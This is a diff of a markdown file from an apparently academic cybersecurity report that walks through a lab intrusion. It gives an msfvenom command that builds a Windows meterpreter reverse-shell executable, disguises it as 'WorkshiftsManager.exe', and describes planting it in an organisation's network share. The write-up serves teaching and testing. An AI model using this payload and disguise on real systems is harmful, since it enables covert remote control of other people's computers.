AM311/Cybersecurity_Report/home.md

 	Using the option `-r disk:share=~/Desktop/share` we can share the folder `share` between the Kali machine and the remote DNS/File Server, so we are able to easily move documents between the two devices.

  6. **Generate of a payload for starting a reverse shell and inject it:**
-	In a different shell window, we now proceed with the generation of an exploit through which we will try to inject a reverse shell client to the computers of the organization.
-	We will use **`meterpreter`** as reverse shell; for doing so, we run the following command on the Kali Linux machine to generate a payload that launches the reverse shell client:
+	In a different shell window, we now proceed with the generation of an exploit through which we will try to inject a `meterpreter` reverse shell client to the computers of the organization.
+For doing so, we run the following command on the Kali machine to generate a payload that launches the reverse shell client:

     `msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp  LHOST=10.0.2.15 -b "\x00" -f exe -o ./Desktop/WorkshiftsManager.exe`

-	 `msfvenom` is a pre-installed payload generator and encoder available on Kali, through which we build a `.exe` file executable on all Windows devices.
+	 `msfvenom` is a payload generator and encoder, through which we build a `.exe` file executable for Windows devices.
 This payload will spawn a reverse shell client, which will connect to the reverse shell server listening on the Kali machine (`10.0.2.15`) on the default TCP port (`4444`).

-	The output of the command execution is a `.exe` file that we will find on the Kali's desktop.
+	The output of the command execution is the  `.exe` file that we will find on the Kali's desktop.
 	The name of the executable (`WorkShiftsManager.exe`) is deliberately misleading since we want not to raise any suspicion.

 	We now need to **inject** the exploit into the systems.
 For doing so, we can easily rely on the remote desktop connection that we have already opened: we copy the executable file into the folder shared between Kali and the server; then, from the remote desktop window that controls the server, we copy the file into the network shared folder.